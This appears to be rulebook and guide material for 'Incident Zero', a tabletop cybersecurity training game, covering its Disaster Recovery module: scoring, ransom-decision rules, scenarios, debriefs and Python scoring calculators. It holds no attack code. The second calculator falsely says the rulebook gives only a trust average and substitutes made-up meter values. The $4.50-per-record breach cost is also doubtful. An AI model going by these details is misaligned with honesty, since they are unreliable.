Data-publication event: if the team has not PAID by the (possibly delayed) deadline, the attacker publishes the stolen data: Customer trust -20, Media trust -15, plus the REFUSE scoring penalty if applicable.

Corrected facts (v2.2): payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage. The FBI discourages payment. Payment guarantees nothing.

Decision Framework for Teams:
  - Small company, limited budget: may pay (can't afford extended downtime)
  - Large company, security-conscious: often refuses (sets precedent, funds crime)
  - Critical infrastructure: may negotiate with government assistance
  - Regulated industry / sanctioned actor: payment may be legally impossible

Educational Purpose: the ethical and practical considerations of ransom decisions; no "right" answer — it depends on risk tolerance.


Financial Impact Tracking

Immediate Costs (paid from DR Budget, floor 0):
  - Crisis Action card costs (see the Crisis Action deck)
  - Event costs (subpoena legal fees, regulatory fine, lost revenue)
  - Ransom payment or negotiation (ACTION-13)

Deferred/Ongoing Costs (narrative-only; discuss in debrief):
  - Credit monitoring, legal costs, long-tail regulatory exposure, customer churn
  - Real-world scale: GDPR fines run up to €20M or 4% of global turnover, whichever is higher; total breach costs typically run to millions

The scoring system captures deferred consequences as Reputation penalties (below) rather than as a parallel money ledger.


Final Scoring (v2.2): Computing Reputation

Reputation is computed once, at game end. The three tracks and five trust meters drive play; Reputation (0-100) is the outcome measure.

FINAL REPUTATION = 100, then apply:

1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
   50-100%  ->  -0
   25-49%   ->  -5
   10-24%   ->  -10
   0-9%     ->  -20

2. STAKEHOLDER TRUST (average of the five meters at game end)
   70%+     ->  +5
   50-69%   ->  0
   30-49%   ->  -10
   below 30 ->  -20

3. DECISION & EVENT MODIFIERS (each applies at most once)
   +5   Customers notified transparently by end of Turn 5 (ACTION-09)
   +3   per completed quality investigation (ACTION-01 or ACTION-04),
        MAX +6 total per game
   -5   ACTION-13 NEGOTIATE          (only one ACTION-13
   -15  ACTION-13 PAY                 modifier can apply)
   -20  ACTION-13 REFUSE and data was published
   -10  EVENT-05 Class Action triggered
   -10  EVENT-06 Regulatory Fine triggered
   -10  EVENT-08 Second Breach triggered
   -15  Customers never notified in-game (deferred statutory violation)
   -20  Regulators never notified in-game (deferred GDPR fine)

4. CLAMP the result to 0-100.

Outcome Tiers (v2.2 — the ONE tier table, identical in the standalone guide)

| Final Reputation | Outcome | Interpretation |
|------------------|---------|----------------|
| 85-100 | Exemplary | Crisis well-managed; stakeholder trust preserved; the organization recovers |
| 70-84 | Managed | Adequate response; some damage; recovery likely |
| 55-69 | Damaged | Poor response; significant customer loss; regulatory scrutiny; recovery uncertain |
| 40-54 | Mismanaged | Major reputational/financial damage; leadership changes likely |
| Below 40 | Catastrophic | Company survival in question; CEO likely replaced |

Loss Conditions (v2.2 — ONE authoritative list, in precedence order)

  1. Any stakeholder trust meter at 0% at any point = immediate loss. "The company collapses." Nothing else matters.
  2. Otherwise, the game ends after Turn 8 (Turn 10 if EVENT-08 fired) and the outcome is the tier table above.

Below 20% trust is a CRITICAL warning state only — it triggers escalation events but is never itself a loss. The old "<30% trust = loss" rule is removed.

Optional Difficulty Variant: Scope-Scaled Start

Default: the Reputation computation starts at 100 for every game. As a clearly-labelled optional difficulty variant, start the computation lower for bigger breaches:

| Scope | Records | Start computation at |
|-------|---------|----------------------|
| Small (Beginner) | ~50K | 100 (default) |
| Medium (Intermediate) | ~500K | 90 |
| Large (Advanced) | 5M+ | 80 |

Worked Example (v2.2, recomputed)

Scenario: "The Ransomware Nightmare" — customer database encrypted and exfiltrated (500K records), ransom demand $1M (20 Budget), publication threatened. Standalone play, default difficulty. Budget 50.

| Turn | Action (cost) | Tracks | Events & trust |
|------|---------------|--------|----------------|
| 1 | ACTION-02 Threat Hunting (8); justification roll 14 → +5% | Inv 20 | |
| 2 | ACTION-06 Containment (8) | Rem 15 | EVENT-01: no media action yet → Media 40→30. Exec +5 → 85 |
| 3 | ACTION-10 Notify Regulators (8); declare ACTION-13 NEGOTIATE (5) | Comm 10 | Customer decay (no Communication action completed yet at start of turn): Customers 50→40. Regulators 60→80. EVENT-04 unprepared (no ACTION-12) → Board 70→50. Publication delayed to start of Turn 7 |
| 4 | ACTION-05 Patch & Harden (10) | Rem 35 | No more decay (ACTION-10 completed). Exec +5 → 90 |
| 5 | ACTION-09 Customer Notification (10) | Comm 30 | Customers 40→55, Media 30→35. EVENT-03 passed → +5 Rep at scoring. (Private company: skip EVENT-09) |
| 6 | Holding Statement (0) | Comm 35 | EVENT-02: already notified → Regulators +5 → 85. EVENT-08 check: Rem 35 ≥ 30 → does not fire |
| 7 | Holding Statement (0) | Comm 40 | Data published (unpaid): Customers 55→35, Media 35→20. EVENT-12: Exec 90→80, Budget 1→0, Inv +5% → 25 |
| 8 | Holding Statement (0) | Comm 45 | Media at 20 (not below 20) → EVENT-07 does not fire. Game ends |

Budget spent: 8+8+8+5+10+10 = 49 of 50 (then -5 subpoena fees, floored at 0).

Final state: Tracks: Inv 25, Rem 35, Comm 45. Trust: Customers 35, Regulators 85, Media 20, Board 50, Executives 80 → average 54.

Scoring:
  - Tracks: Inv 25 (-5), Rem 35 (-5), Comm 45 (-5) → -15
  - Trust average 54 → 0
  - Modifiers: +5 (transparent customer notification by Turn 5), -5 (NEGOTIATE) → 0
  - Final Reputation: 100 - 15 = 85 → Exemplary (barely!)
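The Reputation computation and the worked example above, as an added example that is not part of the Incident Zero rulebook or print pack: a Python implementation of the v2.2 final-scoring rules (track penalties, trust-average modifier, decision and event modifiers, clamp, tier table, the Scope-Scaled Start variant and the 0%-trust loss precedence) that reproduces the 85 / Exemplary result and shows what the same game would have scored with REFUSE instead of NEGOTIATE. Field and function names are my own.

```python
"""Incident Zero v2.2 Disaster Recovery: final Reputation calculator.

Added example; this is not code from the Incident Zero rulebook or print pack.
It implements "Final Scoring (v2.2): Computing Reputation" and reproduces the
"Ransomware Nightmare" worked example. Field and function names are my own.
"""
from dataclasses import dataclass, field, replace
from typing import Dict, Optional, Set

TRACKS = ("investigation", "remediation", "communication")
STAKEHOLDERS = ("customers", "regulators", "media", "board", "executives")
SCOPE_START = {"small": 100, "medium": 90, "large": 80}  # optional difficulty variant


@dataclass
class DRResult:
    """End-of-game state plus the facts the modifier list asks about."""
    tracks: Dict[str, int]                         # track -> 0-100 %
    trust: Dict[str, int]                          # stakeholder -> 0-100 %
    trust_hit_zero: bool = False                   # any meter reached 0% during play
    customers_notified_turn: Optional[int] = None  # turn ACTION-09 completed, or None
    regulators_notified: bool = False              # ACTION-10 completed in-game
    quality_investigations: int = 0                # completed ACTION-01 / ACTION-04
    ransom_decision: Optional[str] = None          # "PAY", "NEGOTIATE", "REFUSE" or None
    data_published: bool = False                   # data-publication event fired
    events_fired: Set[str] = field(default_factory=set)  # e.g. {"EVENT-05"}


def track_penalty(pct: int) -> int:
    """Step 1: per-track penalty from the final-track percentage."""
    if pct >= 50:
        return 0
    if pct >= 25:
        return -5
    if pct >= 10:
        return -10
    return -20


def trust_modifier(average: float) -> int:
    """Step 2: modifier from the average of the five trust meters."""
    if average >= 70:
        return 5
    if average >= 50:
        return 0
    if average >= 30:
        return -10
    return -20


def decision_modifiers(r: DRResult) -> int:
    """Step 3: each modifier applies at most once; only one ACTION-13 line applies."""
    mods = 0
    if r.customers_notified_turn is not None and r.customers_notified_turn <= 5:
        mods += 5                                  # transparent notification by Turn 5
    mods += min(3 * r.quality_investigations, 6)   # +3 each, max +6 per game
    if r.ransom_decision == "NEGOTIATE":
        mods -= 5
    elif r.ransom_decision == "PAY":
        mods -= 15
    elif r.ransom_decision == "REFUSE" and r.data_published:
        mods -= 20
    mods -= 10 * len(r.events_fired & {"EVENT-05", "EVENT-06", "EVENT-08"})
    if r.customers_notified_turn is None:
        mods -= 15                                 # deferred statutory violation
    if not r.regulators_notified:
        mods -= 20                                 # deferred GDPR fine
    return mods


def final_reputation(r: DRResult, scope: str = "small") -> int:
    """Start at the scope value (100 by default), apply steps 1-3, clamp to 0-100."""
    rep = SCOPE_START[scope]
    rep += sum(track_penalty(r.tracks[t]) for t in TRACKS)
    rep += trust_modifier(sum(r.trust[s] for s in STAKEHOLDERS) / len(STAKEHOLDERS))
    rep += decision_modifiers(r)
    return max(0, min(100, rep))


def outcome(r: DRResult, scope: str = "small") -> str:
    """Loss precedence first (any meter at 0%), then the v2.2 tier table."""
    if r.trust_hit_zero or min(r.trust[s] for s in STAKEHOLDERS) <= 0:
        return "Loss: the company collapses"
    rep = final_reputation(r, scope)
    for floor, tier in ((85, "Exemplary"), (70, "Managed"), (55, "Damaged"), (40, "Mismanaged")):
        if rep >= floor:
            return tier
    return "Catastrophic"


# Final state of the worked example: Inv 25 / Rem 35 / Comm 45, trust average 54.
RANSOMWARE_NIGHTMARE = DRResult(
    tracks={"investigation": 25, "remediation": 35, "communication": 45},
    trust={"customers": 35, "regulators": 85, "media": 20, "board": 50, "executives": 80},
    customers_notified_turn=5,
    regulators_notified=True,
    ransom_decision="NEGOTIATE",
    data_published=True,   # published Turn 7; the NEGOTIATE line is the one ACTION-13 modifier
)
# Same game, but the team REFUSED: the -20 "refused and data published" line applies instead.
REFUSED_VARIANT = replace(RANSOMWARE_NIGHTMARE, ransom_decision="REFUSE")

if __name__ == "__main__":
    for label, game in (("NEGOTIATE", RANSOMWARE_NIGHTMARE), ("REFUSE", REFUSED_VARIANT)):
        print(f"{label}: Reputation {final_reputation(game)} -> {outcome(game)}")
```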

Lessons visible in the example: the team skipped board prep (Board Meeting hurt), never bought media management (publication nearly triggered a frenzy at Media 20), and threading the ransom deadline with NEGOTIATE bought exactly enough time to notify everyone first. One different choice and this is a 70s game.

Mandatory-path check (v2.2): the cheapest mandatory beats — investigate (ACTION-03: 5), notify regulators (ACTION-10: 8), notify customers (ACTION-09: 10), remediate (ACTION-08: 6) — cost 29 Budget. A stronger path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44. Both fit a 50-Budget team with room for events.


Sample Disaster Recovery Scenarios (v2.2 card sequences)

Scenario: "The Ransomware Nightmare"

See the worked example above. Key tension: ransom decision vs. notification deadlines.

Scenario: "The Insider Data Theft"

Attack chain revealed: disgruntled employee → lateral movement → Mimikatz → insider data theft. Data already for sale on dark web (no ransom demand — skip ACTION-13).

Suggested line of play (Budget 50-60):
  1. Turn 1: ACTION-03 Log Analysis (5) — establish the insider's access timeline
  2. Turn 2: ACTION-01 Forensic Analysis (12, Duration 2) — evidence for HR/legal/prosecution
  3. Turn 3: ACTION-10 Regulatory/Law-Enforcement Notification (8) — FBI referral
  4. Turn 4: (forensics completes: +25% Inv, +3 at scoring) ACTION-08 Credential Reset (6)
  5. Turn 5: ACTION-09 Customer Notification (10) — transparent disclosure
  6. Turns 6-8: ACTION-06 Containment (8), then Holding Statements

Teaching point: insider threats hit Executive and Board trust hardest; internal communication matters as much as external.

Scenario: "The Supply Chain Compromise"

Attack chain revealed: compromised vendor update → lateral movement → cloud API token theft → DNS tunneling exfiltration → persistent C2.

Teaching point: teams quickly realize they cannot finish remediation by Turn 8 — ACTION-07 rebuilds and ACTION-04 third-party IR eat the clock and the budget. That is the lesson: some incidents transition to months-long response. Expect a "Damaged"-tier result even from good play, and debrief why (complex incidents score lower on the same rubric).


DR Phase Outcomes & Debrief

Mandatory Lessons Learned Debrief (20 minutes)

After DR Phase completion, run a structured debrief:

Part 1: Attack Analysis (5 minutes)

  1. What was the initial compromise vector? Why did defenses fail?
  2. How far did the attacker progress? What could have stopped them?
  3. What was the attacker's objective? (Data theft? Ransomware? Persistence?)

Part 2: Detection Failures (5 minutes)

  1. Why wasn't this detected during Incident Response? What signs did we miss?
  2. What defense would have caught this attack?
  3. What monitoring/logging was inadequate?

Part 3: Response Evaluation (5 minutes)

  1. Was the forensic investigation adequate? What gaps remained?
  2. Did we communicate effectively with stakeholders? What went wrong?
  3. Was remediation thorough enough to prevent re-breach? (Did EVENT-08 fire?)

Part 4: Prevention for Next Time (5 minutes)

  1. What one thing would you deploy first if you replayed?
  2. How would you prioritize defenses differently?
  3. What process improvements would help next time?

Comparison: Hardening vs. Disaster Recovery (the two post-IR paths)

Win Incident Response → Hardening

Lose Incident Response → Disaster Recovery


Integration with Base Game: Full Game Flow

Option 1: Standalone Play (Single Path)

Option 2: Full Campaign (Both Paths)

Option 3: Tournament Mode


Teaching Notes for DR Phase

Key Learning Objectives

Incident Response Skills:
  - Prioritize crisis response actions under pressure
  - Coordinate across teams and stakeholders
  - Make decisions with incomplete information
  - Understand forensic investigation requirements

Business Impact Understanding:
  - Recognize financial costs of breaches (not just immediate costs)
  - Understand regulatory & legal consequences
  - Learn about reputational damage and customer churn
  - Recognize insurance and recovery programs

Stakeholder Management:
  - Communicate effectively with diverse audiences (customers, regulators, media)
  - Balance transparency with liability reduction
  - Manage expectations during crisis
  - Follow regulatory notification requirements (the GDPR 72-hour anchor)

Long-term Recovery:
  - Incident doesn't end when systems are "fixed"
  - Organizational recovery takes months/years
  - Prevention is far cheaper than response
  - Importance of pre-incident preparation

Discussion Questions After DR Phase

For Teams That Had Better Detection (Lost Incident Response by Turn 9-10):
  - "If you'd detected the attack one turn earlier, what would have changed?"
  - "What one additional control would have triggered detection?"
  - "How does dwell time (time from compromise to detection) affect these costs?"

For Teams That Lost Quickly (Out of budget by Turn 5-6):
  - "Why did your investigation fail so quickly?"
  - "Which budget-saving action actually cost you more in the long run?"
  - "What would aggressive early investigation have prevented?"

For All Teams:
  - "How much did this incident actually cost (total financial + reputational)?"
  - "If detection during Incident Response saves 80% of these costs, what should you invest in detection?"
  - "How would a pre-prepared incident response plan have helped?"
  - "What's the value of having a Disaster Recovery plan before you need it?"

Real-World Context for DR Phase

Average Breach Costs (2023 data; narrative-only):
  - Detection Time (Dwell Time): 206 days average
  - Cost per Compromised Record: $4.50 (varies by industry)
  - Total Average Cost: $4.5M (for 1M records)
  - Cost Breakdown: Detection & Analysis 25%, Containment & Eradication 20%, Recovery & Restoration 20%, Legal & Regulatory 15%, PR & Communications 10%, Customer Notifications 10%

Common Mistakes in Real Incidents:
  - Poor forensic planning → Extended investigation costs
  - Late customer notification → Regulatory fines + brand damage
  - Inadequate remediation → Re-compromise (in-game: EVENT-08)
  - Ransom payment → Funds future attacks; doesn't guarantee data deletion
  - No incident plan → Chaos and poor decisions

Success Factors in Real Incidents:
  - Pre-incident planning and training
  - Clear communication protocols
  - Rapid forensic investigation
  - Transparent customer communication
  - Thorough remediation
  - Post-incident review and improvements


Variants & Extensions

Variant: "Instant Replay" Recovery

If a team scores 85+ (Exemplary), they can attempt a post-game Recovery Analysis: spend 5 remaining Budget for a deep forensic review, identify the systemic failure that allowed the Incident Response loss, and describe the detection investment that would have caught it. Models "turning crisis into opportunity."

Variant: "Ongoing Breach" (Extended Campaign)

Disaster Recovery doesn't necessarily end the incident: Week 2 threat hunting discovers a backdoor still active; Week 4 the attacker tries again; Week 8 a new variant appears. Replay DR with the Second Breach event pre-armed. Teams learn that some breaches have long tails.

Variant: "Insurance & Legal" Module

Add negotiation flavor at debrief: Did the insurer cover this incident? (Many policies restrict or exclude ransom coverage.) How much forensic evidence was preserved for lawsuits? Could you have negotiated the regulatory settlement?


Final Thought: Why This Matters

Incident Response teaches: "Catch attacks early"
Hardening (after a win) teaches: "Prevent future attacks"
Disaster Recovery (after a loss) teaches: "Plan for what you'll miss"

Together, they create a complete incident response curriculum:
1. Detection & Investigation (Incident Response)
2. Hardening & Prevention (Hardening — win path)
3. Crisis Management & Recovery (Disaster Recovery — loss path)

Students learn that even with perfect security, breaches can happen. The question isn't "Will we be attacked?" but "When we're attacked, will we respond effectively?"


v2.2 Playtest Edition Changes

  1. Card system is canonical. The freeform Actions A-E from v2.1 are replaced by the 13 Crisis Action cards; track advances are deterministic (no success/failure rolls). The optional Justification d20 (11+ → +5%) is the only roll in track advancement; ACTION-13's "no guarantee" roll is the only other die.
  2. One clock: 8 turns, ~6-12 narrative hours each, Turn 1 ≈ detection +6h to Turn 8 ≈ 72h (fixes the v2.1 7×6h = 42h vs. "48 hours" arithmetic). GDPR 72-hour regulatory notification = ACTION-10 by end of Turn 8, escalating penalties (-10 Regulator trust/turn) from Turn 6. Customer notification recommended by Turn 5. The v2.1 "12-hour regulatory deadline" is relabeled as internal legal/executive escalation. The 30-day/60-day event deadlines are re-expressed as deferred final-scoring penalties (-20 / -15 Reputation).
  3. Reputation reconciled with the percent tracks: the three tracks + five trust meters drive play; final Reputation (0-100) is computed once at game end (start 100; track tiers, trust average, decision/event modifiers; clamp 0-100). One outcome tier table (85/70/55/40), identical here and in the standalone guide.
  4. Single values for former contradictions: negotiation reputation effect -5; late-regulator penalty -10/turn; transparent-notification bonus +5; starting reputation flat 100 (scope-scaled 90/80 is an optional difficulty variant); turn count 8.
  5. Event deck procedure: 12 events split into 6 Scheduled (placed on the timeline at setup) + 6 Triggered (fire once when their condition is met). EVENT-08's "additional 7-turn cycle" is now "+2 turns, once per game."
  6. Multi-turn actions defined once: Duration N occupies the action slot only on the start turn; the advance completes at the start of the Nth following turn; one in-flight multi-turn action at a time. ACTION-04's "runs alongside other actions" text was aligned to this rule.
  7. ACTION-13 Ransom Decision added (Pay 20 / Negotiate 5 / Refuse 0, with the exact effects above) — this is the "Negotiation Team" card promised in v2.1.
  8. Bounds & loss: Budget floor 0 (free Holding Statement always available); trust meters and Reputation clamp 0-100; one loss list — any trust meter at 0% = immediate loss, otherwise the tier table. "<30% = loss" removed; "<20%" is a critical warning state only.
  9. Money mapping: 1 Budget ≈ $50K; remaining dollar figures are narrative-only.
  10. Fact corrections: OFAC/insurance wording for ransom payment; GDPR fine = €20M or 4% of global turnover, whichever is HIGHER; California/CCPA "without unreasonable delay" + statutory damages; turnover-scale fines attributed to GDPR-style regimes (not the FTC).
  11. Balance: forensic-quality Reputation bonus capped at +6 per game; mandatory-path cost verified at 29-44 Budget against the 50 starting budget.

Disaster Recovery Phase for Incident Zero
For teams that experience the cost of failed detection
Emphasizing that response quality matters as much as prevention

docs/standalone-games/disaster-recovery.md

Disaster Recovery Module: Standalone Play Guide

Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Crisis management training, incident response procedures, stakeholder communication

v2.2: the card system is canonical. You play the 13 Crisis Action cards against the 12 Event cards while managing 5 Stakeholder trust meters, over one 8-turn clock. Track advances are deterministic; dice appear only in the optional Justification bonus and ACTION-13's "no guarantee" roll. This guide uses the exact same rules, numbers, and tier table as docs/rules/module-disaster-recovery.md.


Module Overview

The Disaster Recovery Module teaches players how to manage a real breach — investigation, remediation, stakeholder communication, and the ransom decision — under extreme time and budget pressure.

Players balance three progress tracks (Investigation %, Remediation %, Communication %) and five stakeholder trust meters while an event timeline turns up the heat. At the end, a single Reputation score (0-100) is computed from what they achieved.


What You Need

From cards/disaster-recovery/:
- 13 Crisis Action cards (ACTION-01 to ACTION-13)
- 12 Event cards (6 Scheduled + 6 Triggered)
- 5 Stakeholder cards (trust meters)
- A d20, and paper for the tracks/trust/budget (tracker sheets: see print pack, coming)

Money mapping: 1 Budget ≈ $50K.


Setup (5 minutes)

1. Set the Crisis Scenario

The breach has already succeeded. The Threat Orchestrator reveals the full attack chain:

"Your organization has experienced a significant data breach. Here's what happened:

Attack Chain:
1. Phishing Campaign → Employee clicked malicious link
2. Credential Harvesting → Login credentials captured
3. VPN Access → Attacker gained network access
4. Lateral Movement → Access to production servers
5. Database Exfiltration → 500,000+ customer records stolen

Current Status:
- Breach detected; the crisis clock starts now
- Attacker demanding $1M ransom (= 20 Budget) or they publish the data
- Media starting to ask questions
- You have 8 turns (72 narrative hours) to respond

Your Challenge: Investigate the breach, remediate it, and communicate with stakeholders — before the deadlines land."

2. Blue Team Setup

3. Build the Event Timeline (place on table)

| Turn | Time | Scheduled Event / Deadline |
|---|---|---|
| 1 | +6h | Internal discovery |
| 2 | +12h | EVENT-01 First Media Coverage; internal legal/executive escalation complete (narrative) |
| 3 | +18h | EVENT-04 Board Meeting |
| 4 | +24h | |
| 5 | +36h | EVENT-03 Customer Notification Window (ACTION-09 recommended by end of this turn); EVENT-09 Shareholder Pressure (public companies); default ransom deadline (ACTION-13) |
| 6 | +48h | EVENT-02 Regulatory 72h Deadline — escalation begins (-10 Regulator trust per un-notified turn) |
| 7 | +60h | EVENT-12 Government Subpoena (medium/large breaches) |
| 8 | +72h | GDPR 72-hour deadline: ACTION-10 must be complete. Game ends. |

Lay the 6 Triggered events (EVENT-05, -06, -07, -08, -10, -11) face-up where their trigger conditions can be read. Each fires once, when its condition is met.

4. Optional Difficulty Variant: Scope-Scaled Start (clearly optional)

Default: the final Reputation computation starts at 100. For harder games:

| Scope | Records | Start computation at |
|---|---|---|
| Small (Beginner) | ~50K | 100 (default) |
| Medium (Intermediate) | ~500K | 90 |
| Large (Advanced) | 5M+ | 80 |

Gameplay Loop (25-35 minutes)

Turn Sequence

1. START OF TURN
   - Complete any in-flight multi-turn action that finishes now (apply its track advance)
   - Resolve this turn's Scheduled event; check all un-fired Triggered events
   - Apply decay/deadline penalties (Customer decay from Turn 3 if no communication yet; Regulator -10/turn from Turn 6 if un-notified)
   - Announce remaining Budget, tracks, and trust meters

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Play ONE Crisis Action card: pay its cost, apply its track advance — or take the free Holding Statement (0 Budget, +5% Communication)
   - Multi-turn actions (Duration N): occupy the action slot only on the turn started; the advance completes at the start of the Nth following turn; one in flight at a time
   - Justification bonus (optional): strong, specific technical justification → roll d20; on 11+ that action's advance gains +5%
   - ACTION-13 Ransom Decision may be declared at any time before the ransom deadline; it does not use the action slot (once per game)

3. APPLY STAKEHOLDER EFFECTS
   - Apply the action's trust effects (table below)

4. END OF TURN
   - Any stakeholder trust at 0% = immediate loss ("the company collapses")
   - Advance the turn counter; the game ends after Turn 8 (Turn 10 if EVENT-08 fired)

Crisis Action Quick Reference (identical to the cards)

| Card | Category | Cost | Advance | Duration | Trust effects |
|---|---|---|---|---|---|
| ACTION-01 Forensic Analysis | Investigation | 12 | +25% Inv | 2 turns | Regulators +10, Board +5 |
| ACTION-02 Threat Hunting | Investigation | 8 | +15% Inv | 1 turn | |
| ACTION-03 Log Analysis | Investigation | 5 | +10% Inv | 1 turn | |
| ACTION-04 Third-Party IR | Investigation | 20 | +30% Inv, +20% Rem | 3 turns | Regulators +15, Board +15 |
| ACTION-05 Patch & Harden | Remediation | 10 | +20% Rem | 1 turn | Executives +5 |
| ACTION-06 Containment | Remediation | 8 | +15% Rem | 1 turn | Executives +5 |
| ACTION-07 Rebuild from Backup | Remediation | 15 | +25% Rem | 2 turns | Exec +5, Cust +5, Board +5 |
| ACTION-08 Credential Reset | Remediation | 6 | +12% Rem | 1 turn | Executives +5 |
| ACTION-09 Customer Notification | Communication | 10 | +20% Comm | 1 turn | Customers +15, Media +5 |
| ACTION-10 Regulatory Notification | Communication | 8 | +10% Comm | 1 turn | Regulators +20 |
| ACTION-11 Media Management | Communication | 12 | +15% Comm | 1 turn | Media +20, Customers +10 |
| ACTION-12 Board Communication | Communication | 9 | +12% Comm | 1 turn | Board +20, Executives +5 |
| ACTION-13 Ransom Decision | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant | — (scoring only) |
| Holding Statement (free rule) | Communication | 0 | +5% Comm | 1 turn | — (stops Customer decay) |

The Ransom Decision (ACTION-13)

Declare before the ransom deadline (default: start of Turn 5). One option, once per game:

Data-publication event: if the team has not PAID by the (possibly delayed) deadline: Customer trust -20, Media trust -15, plus the REFUSE penalty if applicable.

Facts: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage; the FBI discourages payment; payment guarantees nothing.


Deadline Management (the only clock)


Scoring & Final Reputation (identical to the module rules)

At game end, compute Reputation:

FINAL REPUTATION = 100 (or 90/80 with the scope variant), then apply:

1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
   50-100% -> -0    |  25-49% -> -5   |  10-24% -> -10  |  0-9% -> -20

2. STAKEHOLDER TRUST (average of the five meters)
   70%+ -> +5  |  50-69% -> 0  |  30-49% -> -10  |  below 30% -> -20

3. DECISION & EVENT MODIFIERS (each at most once)
   +5   Customers notified transparently by end of Turn 5
   +3   per quality investigation completed (ACTION-01 or ACTION-04), MAX +6 per game
   -5 / -15 / -20   ACTION-13: Negotiate / Pay / Refuse-and-published
   -10  each: EVENT-05 Class Action, EVENT-06 Regulatory Fine, EVENT-08 Second Breach
   -15  customers never notified in-game
   -20  regulators never notified in-game

4. CLAMP to 0-100.

Worked example: see the module rules (docs/rules/module-disaster-recovery.md) — a 50-Budget team runs ACTION-02, -06, -10, NEGOTIATE, -05, -09 plus Holding Statements and finishes Inv 25 / Rem 35 / Comm 45, trust average 54 → Reputation 85.

Outcome Tiers (v2.2 — the ONE tier table)

| Final Reputation | Outcome | Interpretation |
|---|---|---|
| 85-100 | Exemplary | Crisis well-managed; stakeholder trust preserved; the organization recovers |
| 70-84 | Managed | Adequate response; some damage; recovery likely |
| 55-69 | Damaged | Poor response; significant customer loss; regulatory scrutiny; recovery uncertain |
| 40-54 | Mismanaged | Major reputational/financial damage; leadership changes likely |
| Below 40 | Catastrophic | Company survival in question; CEO likely replaced |

Loss precedence: (1) any stakeholder trust at 0% at any point = immediate loss; (2) otherwise, the tier table above. Below-20% trust is a critical warning state only.
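The four scoring steps, the tier table and the loss precedence above, implemented as an added example (not code from the Incident Zero rulebook). The five trust-meter values in `WORKED_EXAMPLE` are constructed so that they average 54, which lets the block reproduce the module rules' worked example (Inv 25 / Rem 35 / Comm 45, NEGOTIATE, customers notified by Turn 5, regulators notified, no quality investigation → Reputation 85):

```python
"""Final Reputation calculator for the Disaster Recovery module (v2.2).

Added example, not code from the Incident Zero rulebook: implements the four
scoring steps (track tiers, trust average, decision/event modifiers, clamp),
the outcome tier table and the loss precedence, then reproduces the rulebook's
worked example (Inv 25 / Rem 35 / Comm 45, trust average 54 -> 85).
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional, Tuple

# (lower bound, modifier) pairs, checked from the top tier downwards
TRACK_TIERS = ((50, 0), (25, -5), (10, -10), (0, -20))
TRUST_TIERS = ((70, 5), (50, 0), (30, -10), (0, -20))
OUTCOME_TIERS = ((85, "Exemplary"), (70, "Managed"), (55, "Damaged"),
                 (40, "Mismanaged"), (0, "Catastrophic"))
RANSOM_MODIFIER = {"none": 0, "negotiate": -5, "pay": -15, "refuse_published": -20}
SCORED_EVENTS = {"EVENT-05", "EVENT-06", "EVENT-08"}     # -10 each, at most once


def tier(table, value):
    """Return the modifier/label of the first tier whose lower bound `value` meets."""
    for lower, result in table:
        if value >= lower:
            return result
    return table[-1][1]


@dataclass
class EndState:
    investigation: int
    remediation: int
    communication: int
    trust: Dict[str, int]                           # the five stakeholder meters
    start: int = 100                                # 90 / 80 with the scope variant
    customers_notified_turn: Optional[int] = None   # turn ACTION-09 completed, None if never
    regulators_notified: bool = False               # ACTION-10 completed in-game
    quality_investigations: int = 0                 # ACTION-01 / ACTION-04 completed
    ransom: str = "none"                            # ACTION-13 choice
    events_fired: FrozenSet[str] = frozenset()


def immediate_loss(s: EndState) -> bool:
    """Loss precedence (1): any trust meter at 0% ends the game as a loss."""
    return any(v <= 0 for v in s.trust.values())


def final_reputation(s: EndState) -> int:
    score = s.start
    # 1. track results, applied per track
    for pct in (s.investigation, s.remediation, s.communication):
        score += tier(TRACK_TIERS, pct)
    # 2. stakeholder trust, average of the five meters
    score += tier(TRUST_TIERS, sum(s.trust.values()) / len(s.trust))
    # 3. decision & event modifiers, each at most once
    if s.customers_notified_turn is not None and s.customers_notified_turn <= 5:
        score += 5
    score += min(3 * s.quality_investigations, 6)           # capped at +6 per game
    score += RANSOM_MODIFIER[s.ransom]
    score -= 10 * len(SCORED_EVENTS & s.events_fired)
    if s.customers_notified_turn is None:
        score -= 15
    if not s.regulators_notified:
        score -= 20
    # 4. clamp
    return max(0, min(100, score))


def outcome(s: EndState) -> Tuple[int, str]:
    """Loss precedence (2): the tier table applies only if no meter hit 0%."""
    if immediate_loss(s):
        return 0, "Immediate loss (trust meter at 0%)"
    rep = final_reputation(s)
    return rep, tier(OUTCOME_TIERS, rep)


# The rulebook's worked example; the meter values are constructed to average 54
# (the rulebook states only the average).
WORKED_EXAMPLE = EndState(
    investigation=25, remediation=35, communication=45,
    trust={"Customers": 55, "Regulators": 60, "Media": 45, "Board": 50, "Executives": 60},
    customers_notified_turn=5, regulators_notified=True, ransom="negotiate",
)

if __name__ == "__main__":
    print(outcome(WORKED_EXAMPLE))   # (85, 'Exemplary')
```

Because every modifier is applied through one function, a Threat Orchestrator can also use it to check edge cases of the rules: the +6 cap on quality investigations, the clamp at both ends, and the fact that a meter at 0% overrides the tier table regardless of the computed score.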


Debrief & Reflection (5-10 minutes)

PART 1: INVESTIGATION QUALITY (2 min)
1. "Did you investigate adequately? What's the total impact?"
2. "What important information did you miss?"
3. "Would better forensics have changed your decisions?"

PART 2: COMMUNICATION STRATEGY (2 min)
1. "How did you prioritize stakeholder notifications?"
2. "What would you communicate differently?"
3. "Did transparency help or hurt your reputation?"

PART 3: FINANCIAL DECISIONS (2 min)
1. "Did you pay the ransom? Why or why not?"
2. "What was your total incident cost (Budget spent × $50K, plus deferred penalties)?"
3. "Would different decisions have saved money?"

PART 4: RESPONSE QUALITY (2 min)
1. "If you replayed, what would you do first?"
2. "Which stakeholder relationship was hardest to preserve?"
3. "What was your biggest crisis decision?"

PART 5: REAL-WORLD CONNECTION (2 min)
1. "Compare your spending to actual breaches (Target, Equifax, etc.)"
2. "What's harder: prevention or response?"
3. "Why is it so expensive to manage a real breach?"


Tips for Threat Orchestrators

Breach Scenario Variations

